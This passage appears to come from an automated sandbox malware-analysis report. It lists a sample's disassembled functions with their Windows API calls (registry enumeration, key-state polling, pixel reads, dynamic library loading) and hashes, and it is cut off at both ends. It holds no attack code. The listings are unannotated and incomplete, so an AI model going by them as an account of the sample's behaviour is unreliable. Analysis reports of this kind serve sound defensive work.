                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00D36E89
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D36EBB
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00D36ECC
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00D36F06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: e61d674aae3ecc56c051a777e2b700eac37bbe004d1bb3bb4d871c57b24614cc
                                                            • Instruction ID: bc47f3bf62907cf8b065d435f1208f6b7920a5334b4ed84da45b665472784bb0
                                                            • Opcode Fuzzy Hash: e61d674aae3ecc56c051a777e2b700eac37bbe004d1bb3bb4d871c57b24614cc
                                                            • Instruction Fuzzy Hash: 06215EB9500305ABDB209F69DC04A9A77E8EF45720F288A19FDA1E72D0DB70E8558B71
                                                            Function 00D3AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00D3AC54
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00D3ACA8
                                                            • __swprintf.LIBCMT ref: 00D3ACC1
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00D5F910), ref: 00D3ACFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: 40f48c769fa29d1c26694932b5762102b5a0d3dd0683391fcc5810950783103b
                                                            • Instruction ID: 9a2efc96416c6e2ad2364eea588614ecf1abfba22cd94aa47d156865044b62b0
                                                            • Opcode Fuzzy Hash: 40f48c769fa29d1c26694932b5762102b5a0d3dd0683391fcc5810950783103b
                                                            • Instruction Fuzzy Hash: 4F217F35A00209AFCB10EF69C945DAE7BB8EF89715B004069F909EB351DB31EA45DB71
                                                            Function 00D31AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00D31B19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 1f0f5a1936ab211a96f8f665a0cccd3ce11d348dd40505a9b25e1d93b8d9aa67
                                                            • Instruction ID: 71f71165717b36ec2ba963df16ca8511b618aff80aeaac31e8deb3cf8fed5db7
                                                            • Opcode Fuzzy Hash: 1f0f5a1936ab211a96f8f665a0cccd3ce11d348dd40505a9b25e1d93b8d9aa67
                                                            • Instruction Fuzzy Hash: 1E113C749002098FCF40EF94D9618FEF7B4BF26704F5444A9D954A7792EB325906EB60
                                                            Function 00D4EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00D4EC07
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00D4EC37
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00D4ED6A
                                                            • CloseHandle.KERNEL32(?), ref: 00D4EDEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: d3fbed2a8371f977fd4bb3f2a19d06f83de19f43fedd89447d2a6458d2e63ce8
                                                            • Instruction ID: 93efaf532c8bfed9f5afc29e80f647034dc4d6790dc602f651b12144956cf2a7
                                                            • Opcode Fuzzy Hash: d3fbed2a8371f977fd4bb3f2a19d06f83de19f43fedd89447d2a6458d2e63ce8
                                                            • Instruction Fuzzy Hash: DA813C75600711AFD760EF28C886B2AB7E5EF44B10F14881EFA99DB3D2D770AC449B51
                                                            Function 00CF541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction ID: ae307ee191d714538304556174a6ea46b83deb4f4746cb433e4d35401c9c0b17
                                                            • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction Fuzzy Hash: C951E970A00B0DDBCB648FA9D84067E7BB2EF40321F248729FB35962D0D7709E519B42
                                                            Function 00D50037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D4FDAD,?,?), ref: 00D50E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D500FD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D5013C
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D50183
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00D501AF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00D501BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 92d1d2645dd1d55048a119e3e552cb77e98f26e592268dd57d7d23a8527afd0d
                                                            • Instruction ID: 8b917236051c8ac8a5c31b0261686366b920b0c3d0f1ae971f4327e4c66b5d13
                                                            • Opcode Fuzzy Hash: 92d1d2645dd1d55048a119e3e552cb77e98f26e592268dd57d7d23a8527afd0d
                                                            • Instruction Fuzzy Hash: F5512B71208304AFDB14EF58C881E6EBBE9FF84315F44491EF9958B291DB31E909DB62
                                                            Function 00D4D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D4D927
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00D4D9AA
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00D4D9C6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00D4DA07
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D4DA21
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D37896,?,?,00000000), ref: 00CD5A2C
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D37896,?,?,00000000,?,?), ref: 00CD5A50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: 8e741a1ffab4e847ec465b830bc6627729ef541ed1657568955799e22ba2dae2
                                                            • Instruction ID: c83bb5d4144e0da646a445b0a9855cf11d55e45286456a16aaa2c8461f4b86d4
                                                            • Opcode Fuzzy Hash: 8e741a1ffab4e847ec465b830bc6627729ef541ed1657568955799e22ba2dae2
                                                            • Instruction Fuzzy Hash: C7512835A00609DFCB00EFA8C4859ADB7F5FF19320B188066E959AB312D731ED45DFA1
                                                            Function 00D3E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00D3E61F
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00D3E648
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00D3E687
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00D3E6AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00D3E6B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: 1ba0cce61b95befe5249fc0b66aaa66c81c637671bbc0ffa3e44e4e828bb1ee1
                                                            • Instruction ID: 5e63f8bdb47b7d85d3d08844c8602dad2210dd55ccd5b4352af47acdeb4cff06
                                                            • Opcode Fuzzy Hash: 1ba0cce61b95befe5249fc0b66aaa66c81c637671bbc0ffa3e44e4e828bb1ee1
                                                            • Instruction Fuzzy Hash: 46512F79A00205DFCB01EF64C9819AEBBF5EF09714F148495E949AB3A2CB31ED11EF61
                                                            Function 00CD2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00CD2357
                                                            • ScreenToClient.USER32(00D957B0,?), ref: 00CD2374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00CD2399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 00CD23A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 9d2d80753e724263aac8c3e166bb3b8837c2617a8f07758f52ea6e13962752f4
                                                            • Instruction ID: 67398c054659ebfa3a7ccda4c413e1e4a468762f2144cc06879b9eee5110097f
                                                            • Opcode Fuzzy Hash: 9d2d80753e724263aac8c3e166bb3b8837c2617a8f07758f52ea6e13962752f4
                                                            • Instruction Fuzzy Hash: 9F418E75608205FBCF259F68C844AEDBB78FB15360F20431AF939972E0C7359954EBA1
                                                            Function 00D263AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D263E7
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00D26433
                                                            • TranslateMessage.USER32(?), ref: 00D2645C
                                                            • DispatchMessageW.USER32(?), ref: 00D26466
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D26475
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: ab5c2d7d13c94732864f382a2061a70b45f67fb618c09fd34ffb278b2407b93b
                                                            • Instruction ID: 9223e143f76e5397aa213ea4ad47520a1ac0a47ad52b4fe8ef2c3435d4d4255f
                                                            • Opcode Fuzzy Hash: ab5c2d7d13c94732864f382a2061a70b45f67fb618c09fd34ffb278b2407b93b
                                                            • Instruction Fuzzy Hash: 6931B431904766DFDB25DFB0FC44BA67BA8AB21308F180176E5A1C62A4E735D44AD770
                                                            Function 00D28A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00D28A30
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00D28ADA
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00D28AE2
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00D28AF0
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00D28AF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 35a995d492b10ab0b35c9f0b3d43e461f584ea928b56912d2c2291d88f6bd02a
                                                            • Instruction ID: 80ec06694c4ad42f989309b146db1f8dae619f6c2773cb6d9e89cccc9c5c2d53
                                                            • Opcode Fuzzy Hash: 35a995d492b10ab0b35c9f0b3d43e461f584ea928b56912d2c2291d88f6bd02a
                                                            • Instruction Fuzzy Hash: 4631C271501329EBDF14CF68E94CA9E3BB5FB1431AF144229F925EB2D0CBB09914DBA0
                                                            Function 00D5B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D5B192
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00D5B1B7
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00D5B1CF
                                                            • GetSystemMetrics.USER32(00000004), ref: 00D5B1F8
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00D40E90,00000000), ref: 00D5B216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: 8264b35339d575d4e838023908a8d7bc83e6758f3a1d997d14f0e74cf579d182
                                                            • Instruction ID: c84156c2838c82bcc7b2024b1a9b42385cceae3c2f234b5a250eeee8bd7dc744
                                                            • Opcode Fuzzy Hash: 8264b35339d575d4e838023908a8d7bc83e6758f3a1d997d14f0e74cf579d182
                                                            • Instruction Fuzzy Hash: 4E217C71A10755AFCF109F38DC18A6A3BA4EB05372F14463ABD62D72E0E73098148BB0
                                                            Function 00D45A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(00000000), ref: 00D45A6E
                                                            • GetForegroundWindow.USER32 ref: 00D45A85
                                                            • GetDC.USER32(00000000), ref: 00D45AC1
                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00D45ACD
                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00D45B08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: f3358b732c461addce2ae0015c9b38f2d4b8c036c90665ebfb0baae17b7412d4
                                                            • Instruction ID: f255ba210a2e8ce0c2a4be4a00ee69827651e621d6894c734e874b7e6d69d186
                                                            • Opcode Fuzzy Hash: f3358b732c461addce2ae0015c9b38f2d4b8c036c90665ebfb0baae17b7412d4
                                                            • Instruction Fuzzy Hash: 5C218175A00304AFD714EF69DC89AAABBE5EF48351F148479F949D7362CB70AD00DBA0
                                                            Function 00CD12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00CD134D
                                                            • SelectObject.GDI32(?,00000000), ref: 00CD135C
                                                            • BeginPath.GDI32(?), ref: 00CD1373
                                                            • SelectObject.GDI32(?,00000000), ref: 00CD139C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 4d2b0531bdd08902f4b57a25eea4cae3661a4f7623cfe990d5beef594b6a42c0
                                                            • Instruction ID: f7fe3d8e75309d9f2d7e2cbf296360ce96c3b31973f82dac2b2f2688e6a74e3f
                                                            • Opcode Fuzzy Hash: 4d2b0531bdd08902f4b57a25eea4cae3661a4f7623cfe990d5beef594b6a42c0
                                                            • Instruction Fuzzy Hash: 1F214A70801709EBDB129F29EC487697BA8AB10322F584227F914DA3B4D7719991DBA0
                                                            Function 00D34A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D34ABA
                                                            • __beginthreadex.LIBCMT ref: 00D34AD8
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00D34AED
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D34B03
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D34B0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: 2abeb3227514848965cecfed513d09e14f751ac58b4da2e43df2f17255cc4405
                                                            • Instruction ID: 8595497601d950880242aa1496747a572f1a24152dd731e7ddcd1f664de33ed4
